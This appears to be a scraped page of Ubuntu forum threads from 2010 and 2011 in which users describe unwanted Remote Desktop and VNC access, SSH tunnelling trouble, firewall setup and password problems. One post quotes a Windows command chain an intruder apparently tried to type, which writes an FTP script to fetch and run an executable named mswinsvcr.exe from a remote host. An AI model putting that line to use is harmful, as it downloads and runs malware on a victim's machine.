Ubuntu Security :: Security Changed In Remote Desktop?
Jul 6, 2010
I always use VNC to check my server for updates, and this morning I started the xvnc4viewer to vnc into my server and it keep asking for a password. I never setup a password because I do this local from my laptop, and I am the only one who uses my laptop. I had to go to my server and check the setting in System > Preferences > Remote Desktop and found them all changed. There was a password setup and there was a check mark in the you must confirm each access to this machine there some security update that changed all these setting? Sometimes when I do updates I don't know what is being changed on my server
View 9 Replies
ADVERTISEMENT
Mar 24, 2010
So I've read a bit and it seems that this is okay and secure. But I wanted to double check here with everyone, because I trust here more than just about anywhere. I've read about the hipporemote (which is pretty cool) and I have it working. Basically I want to make sure my system is still secure.
1. I had to open a port on my firewall for the VNC connection.
2. I turned on the Remote Desktop
2a. Checked Allow other users to view....
2b. Checked Allow other users to control....
2c. Checked You must confirm.....
2d. Checked for password, and put in a password
2e. Checked Configure network automatically to accept connectios
So with doing all of that, am I ok? I think so, especially since it says its only accessible on my local network. But I just wanted to hear from people who know more than I do that I don't need to worry any more than normal about others accessing my machine. I'm mainly thinking 2e, I don't fully understand what's going on there.
View 9 Replies
View Related
Mar 21, 2010
Today I noticed my Desktop was being controlled remotely from over the Internet even though I had it set for 'local network only'. Foolishly I relied on this setting and hadn't specified a password or other security. The remote user had opened my Firefox passwords page and was perusing this when I pulled the plug.
All external checks confirmed that my router/firewall is actively blocking correctly. How could this happen? How can I prevent this in the future? I had recently install the Firefox extension for Weave Sync and wonder if that had anything to do with it?
View 9 Replies
View Related
Nov 26, 2010
I just had a window pop up on my desktop saying my pc was being remotely controlled. Ubuntu 10.10The pc shutdown by itself, and I disconnected it from the net.I rebooted and uninstalled the remote desktop app.
View 7 Replies
View Related
Feb 16, 2010
I am attempting to set up a VNC with ssh tunneling for remote desktop between my laptop (opensuse 11.2) and my desktop (kubuntu karmic) and using the instructions here: [URL] and here: [URL] but I am having trouble getting remote desktop to work once I establish the ssh tunnel
I start out with
Code:
ssh <user@remotepc> -p <non22port> -L 5900:localhost:5900
That seems to wok and connect properly
The problem comes when I try to use a remote desktop client on the laptop to initiate the VPN desktop sharing and point it to
Code:
localhost:5900
Thats when I get a notification on the host saying:
Code:
Refused uninvited connection attempt from 127.0.0.1
And on the laptop I get:
Code:
VNC server closed connection
I have tried messing with the few settings in Krfb, but none seem to have any impact. How do I open localhost:5900 and allow VPN tunneling to the host machine?
View 2 Replies
View Related
Jun 5, 2011
I was sitting watching a TV show on the internet (streaming from channel 4) and all of a sudden I get a request from an unknown IP address, outside of my local network attempting to access my ubuntu desktop, I obviously declined straight away and stupidly didn't take note of the IP I've checked my firewall settings and no ports are being forwarded, everything is as it should be. I am running Ubuntu 11.04, and a little bit concerned. As of now I have completely disabled remote desktop on my laptop.
View 1 Replies
View Related
Aug 1, 2011
I have been using Remote desktop on Windows 7 to view and control my Ubuntu machine in the office quite happily over the office network. No problems there. I wanted to access it from my home connection so I read that I could do this by opening a port on the ubuntu machine's firewall. So I installed a firewall. Didnt see any way to open a port easily so I uninstalled it and installed another one. Same issue so I uninstalled that and then left it. I then tried to Remote Desktop the Ubuntu machine from my Windows 7 laptop and ERROR I can no longer connect.
View 6 Replies
View Related
Apr 27, 2010
I was working on my desktop under Ubuntu 9.10 when I got a message in the the upper right telling me that my Remote Desktop Connection had been activated. I don't know who it was, but they proceeded to open up a terminal and start typing a bunch of stuff. This scared the living @#$^ out of me, so I didn't really pay attention to what he was doing and immediately dove for the reset button. I disconnected my network from the web and found that RDC was NOT password protected.
Now, I probably did this a little while ago while I was playing around with it, but I also set up an account with dyndns.org. Would this possibly increase the number of attacks on my network? Just in case, I have removed my listing. Also, would any of this incident be logged somewhere? How/Where would I look to see if I'm being poked and prodded for another security hole?
View 6 Replies
View Related
Oct 14, 2010
I have a home LAN server with Ubuntu Desktop edition 10.10 and I'm having a problem with remote desktop application. For now I have a monitor on that machine, but in the future it's gonna be only the box, without any periferal devices. When I try to log in via UltraVNC from Windows XP, on Ubuntu server a little window pops up, asking me to allow or refuse this "invader", so I click Allow and I really have full control on that machine. However, when I dont have any devices I wouldnt be able to click this Allow button, but will have to have full control. So, my question is how to autoclick this Allow button? Or when I try to log in the ubuntu machine, it would automatically give me full control?
View 5 Replies
View Related
Dec 30, 2010
host always ask password on 1st remote desktop (VNC) access Desktop version... how can I disable this?
View 2 Replies
View Related
Jul 20, 2010
I was running ubuntu 10.04 on a school laptop connected to the network. I was editing a file in emacs on an ssh connection to a school server when all of a sudden I see the remote desktop graphic (a thing that looks like a widescreen monitor) pop up in the top panel. A second later it announces that someone else has connected to my computer with 'ffff:someip'. I'm not sure of the specifics because I was too shocked. I do remember it started with some number of f's before a : The hacker then started typing
Code:
%systemroot%system32cmd.exe
del eq&e
I promptly yanked out the ethernet cable before anything else could be typed. I then went in and changed the Remote Desktop preferences to not allow anyone in. I'm guessing that I cut the hacker off from fully entering in a command similar to this:
Code:
%systemroot%system32cmd.exe
del eq&echo open 0.0.0.0 13643 >> eq&echo user 13302 30046 >> eq &echo get
mswinsvcr.exe >> eq &echo quit >> eq &ftp -n -s:eq &mswinsvcr.exe &del eq
which I found here: [URL]
How concerned should I be? It appears to be a windows hack. Did I prevent any damage from occurring? Is Remote Desktop really that easy to connect to another persons computer? I know this question is bait in a way. On my home machines I only allow vnc via ssh tunnels and that is through a router with proper port forwarding for the ssh ports and very few other ports forwarded. Such an attack has never happened to me at home. Is this possibly due to my setup or was I just lucky no one picked my computer to hack? So is the ssh tunnel & port forwarding a sufficiently safe setup or am I still at risk?
What degree of protection does the ssh tunnel and port forwarding provide? What else should I do to make my current home setup even more secure? The text I wrote above was the only text typed into the terminal. Because the attack was over Remote Desktop, what is the possibility that it was a bot? The text appeared slow enough for me to think that there was a person rather than a machine/program typing in the text. Does the Remote Desktop connection in a way provide a level of abstraction that prevents scripts as commands must be typed in through the Remote Desktop connection (vs. a ssh connection where a script might more easily be uploaded and executed)?
In the end I'm curious as to what else might have been accessed over the connection or if it was probably just restricted to the hacker attempting to run some windows commands? Since they connected via Remote Desktop and I saw the connection pop up and the typing begin in my terminal, did I see everything that the hacker attempted to perform? Am I correct in my research in finding that there is no log for Remote Desktop connections and therefore I can't find the ip they were connecting from? However, I would like to use this as a wake up call to myself to prevent unwanted access on my home computers.
View 9 Replies
View Related
Jan 11, 2010
was home when the attack took place I was running a vnc server that was tunnled thru ssh. At approximatley 5:00 pm eastern time my box turned on firefox and flashed a popup. I tried to get to the logs and then realized that the entre system had been hijacked the remote desktop icon was active there was a message in gnote saying "youve been own3d". The system Is a old mac mini PPC system and i plan on looking at the system log with a netboot cd by running linux rescue at boot. my question is how do i gain access to the system log from a rescue cd to find out how much damage this hacker did?
View 4 Replies
View Related
Apr 10, 2010
I'm running 64-bit Ubuntu Karmic, Encrypted HDD.I changed my login passwordwhen i try to boot i click on my name and type in my new password i have 'authentication fail' when i type in my old password this happens"could not update ICEauthority file /home/chris/ICEauthority""Their is a problem with the configuration server. (/usr/lib/libconf2-4/gconf-sanity-check-2) exited with status 256""Nautilus could not create the following required folders/Home/chris/Desktop,/home/chris/.nautilusBefore running nautilus, please create these folders, or set permissions such that nautilus can create them."
View 4 Replies
View Related
Jan 20, 2011
Protect against root password change[Log in to get rid of this advertisement]I have recently had to force a change of the root password on a linux box I was running. It was a test system which I had not used in a while, so I forgot the root password (not so smart).Anyway, I found that it was amazingly easy to reset the root password. Here is a straight forward article on how to do it.URL...
My question is: how can you protect against this? I see this as a security hole.I understand that the user must have physical access to the computer, but if I want to lock the system down so you cannot easily enter single user mode or the root password cannot be changed.
View 1 Replies
View Related
Sep 12, 2010
Rkhunter file properties changed
View 2 Replies
View Related
Oct 23, 2010
So for ive changed the dns on my home router to Opendns and ive added this What does a dns attack look like? how would i know is my dns was poisoned or if i was under a kaminsky style attack?
View 9 Replies
View Related
Mar 11, 2011
Just want to stealth ports on my laptop. Had problems with firestarter when I installed in on 10.10. Set Firestater back to defaults and then dumped it with:
Code:
sudo apt-get purge firestarter
Set up Gufw to defaults and now am not sure what I am seeing with iptables.
iptables -L shows .....
Do these settings look correct for default settings for Gufw? or do I still have some problems with the old firestarter settings not being removed. All I want is all ports stealthed. I know that ping is enabled but I believe that is a default setting in ufw. Could I restore iptables to default with:
Code:
sudo iptables -F
and then enable Gufw and set default?
View 5 Replies
View Related
Jul 9, 2010
I am running a Fedora 10 Virtual Server and get have a feeling I have been hacked. I needed to fix a source file that I had definately not changed myself. It was a PHP file concerned with usernames and passwords so that made me even more suspicious. I have been investigating and found the following. If you need other information give me the command I should run and I will update, I am no expert in this area and use the server to host my website and SVN. I am the only person that has access to the server.
Code:
# lsof -u nobody
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
[code]....
View 4 Replies
View Related
Aug 25, 2010
I just changed my password now every time I start my computer the keyring wants my old password and it keeps doing weird things even after I type it in. Like Ubuntu will say No keyring found or something to that effect anyway.
View 4 Replies
View Related
Apr 19, 2011
When I set up an ID in Ubuntu, I encrypted it. I did a print screen of the passphrase and put it on the desktop. I'm just learning how to use the encryption so don't fault me for putting it right on the desktop. There is no important data in this ID. Now, I went and changed my password to the account. On the next boot, I got a few error message:
Could not update ICEauthority file /home/mickymouse/.ICEauthority
There is a problem with the configuration server /usr/lib/libconf2-4/gconf-sanity-check-2 exited with status 256 In researching these, it looks like the problem is that I changed the password but didn't update (or something) my passphrase.
I can't boot into the GUI but I have figured out how to boot to a command prompt. I don't have access to my home directory because I don't have my passphrase. Am I toast or is there a way to recover / update the passphrase?
View 3 Replies
View Related
Jan 25, 2011
is there a way to display a list of all the files changed during current session?
View 4 Replies
View Related
Nov 24, 2010
For the second time in a week, I have set up an unmanaged CentOS 5.5 Storm Server at StormOnDemand, only to discover a ton of unauthorized changes to binaries (updated file checksums and sizes) on the server shortly thereafter.The time stamps do NOT change.If the time stamps did change, I would be hunting down ahat was doing some auto-updates. But the time stamps are not changing.This leads me to believe that either these servers are suffering from:1. A virus or hacker is compromising the box.2. system corruption.3. Something else? To eliminate the possibility of number 1, I toasted the first server and started over with a new server and enabled their firewall from the start to only allow access for two IPs via SSH... my IP and my biz partner's.
Then, one of the first things we installed was a system we created that maintains a snapshot of most directories on the system so that it can be used to watch the live directories for changes. At 4:07am (server time) this morning, we received notice from this system that a massive number of files had changed in these directories. Again, no file time stamps changed.So, my question is this... is there any legitimate reason in a fairly standard CentOS 5.5 install that would cause so many files to change?
View 2 Replies
View Related
Feb 8, 2011
We are on our first Linux platform and I am trying to coordinate a distributed application backup across multiple machines. I am trying to write a script in which I would have used RSH to execute scripts on the other servers. We are no longer allowed to use rsh, and someone suggested ssh. I am using that instead of telnet, but I am not sure of the syntax"rsh server [-n] path/executable" is what I would have used, just not sure of the syntax for ssh
View 8 Replies
View Related
Jan 29, 2010
how i can remote access my pc at home from work ? on different pc that has access to INTERNET. what software shall I install on my pc at home ? I want to be able to install software on my pc at home from my work place, my home pc has unbuntu Linux ubuntu 2.6.31-17-generic #54-Ubuntu SMP Thu Dec 10 17:01:44 UTC 2009 x86_64 GNU/Linux
View 9 Replies
View Related
May 13, 2010
I'm trying to SSH into my home computer from a remote location outside of my house's LAN and can't figure out remote port fowarding.
The guide here says to use the following:
Code:
I've tried connecting to my home computer through many combinations of the syntax listed above, read the man file, and looked online for help. But can't find out the proper syntax or a good guide that isn't written for Windows users using Putty.
Let's assume for the sake of simplicity that the public IP address of my home SSH server is 123.123.123.123, the private IP address of my home SSH server is 192.168.1.100, my home SSH port is 2222, and the SSH port at my current location is is 22. How would I write out the command?
Every time I try to connect I get a "connection times out" error.
View 9 Replies
View Related
May 30, 2011
When I access a remote Natty client using VNC I cannot use the sudo command in a terminal. In fact, the terminal closes itself as soon as I type the sequence sud. Even su d. Or su d.
Sua, su a, su c, su e do not cause the terminal to close itself.
This appears to be some sort of new security "feature".
How do I "work around" it?
[edit]
I'd better elaborate.
I have a remote Natty running 11.04 64-bit desktop version. I have installed tightvncserver on it. I log in on 5901 from a Ubuntu 10.04 64-bit desktop using vinagre. The desktop works fine except when I open a terminal in it and type sud. As soon as I type the d the terminal vanishes. This appears to be a deliberate feature. I also log in to other clients that run 10.04 and this does not happen. I have run Mint 11 in VirtualBox on my local machine and created the same remote desktop and viewed it from mint 11 itself. Same thing happens.
It seems to me that 11.04 has been modified to kill a terminal that is part of a VNC display when sud are typed.
how to remotely administer a 11.04 desktop?
View 2 Replies
View Related
Jan 20, 2010
I am trying to access files on a laptop (running Windows 7) from an Ubuntu desktop running 9.10. I can view the Windows 7 files just fine. Listing their permissions from an Ubuntu terminal shows them to be read/write by everyone. But, I am unable to update any of the files from Ubuntu.
I mount the files using the command:
mount -t cifs //richard-pc/C -o username=***,password=***,dir_mode=0777,fi
le_mod=0777 /mnt/windows7c
The permissions on the Windows 7 files on the laptop are set to Full Control by Everyone.
View 9 Replies
View Related
Aug 6, 2010
We have approximately 100 retail locations that will have split vpn tunneling. Intranet traffic will flow over the vpn to the corporate headquarters, voip traffic will tunnel to a regional hub and internet bound traffic will go over the local isp. The retail locations are small with 1-8 users and no enterprise grade equipment (servers, etc). This setup in effect will render our current content filtering solution useless.
The locations will be equipped with Cisco ASA 5505 Firewalls. The original plan was to use a Websense server and the url filtering feature to act as a content filter. I just found out that pricing for Websense was not included in the budget will be a show stopper.There may also be some performance issues with this method. Putting a proxy server at each location is not really an option. We do not have the resources to place a server at each location, plus the users could simply unplug an inline device or go around it. There is minimal supervision at most of these locations.
Ideally, I would like to find a way to use something like Dansguardian with an ldap interface and the url filtering feature of the ASA firewalls. I found a program called n2h2p, but I can find 0 documentation for it. It is also 2 years old with no updates. I also need to be able totrally manage this as trying to keep up with 100 different configurations for 400 users would be virtually impossible for the amount of time I will have available
View 9 Replies
View Related
Aug 8, 2010
Is it possible to remotely access, inject, manipulate files and/or folders in the Windows NTFS partition when logged into Ubuntu?
I'm either logged into Windows or Ubuntu but NOT both -- ever. Therefore, while logged into Ubuntu, would it be possible for someone to crack into Windows via Ubuntu using Wi-Fi or modem?
View 5 Replies
View Related
Aug 21, 2010
I had remote desk running on a machine and I went downstairs the other day, turned it on, and someone was controlling the machine. Of course that's partially my fault since there was -zero- rd password set. However, my question is how did this person figure out my IP and get past the router to the machine? I don't have any forwarding setup. My router admin password is (has always been) strong. I guess my question now is: Is there anyway to restrict rd access to the local network?
View 9 Replies
View Related
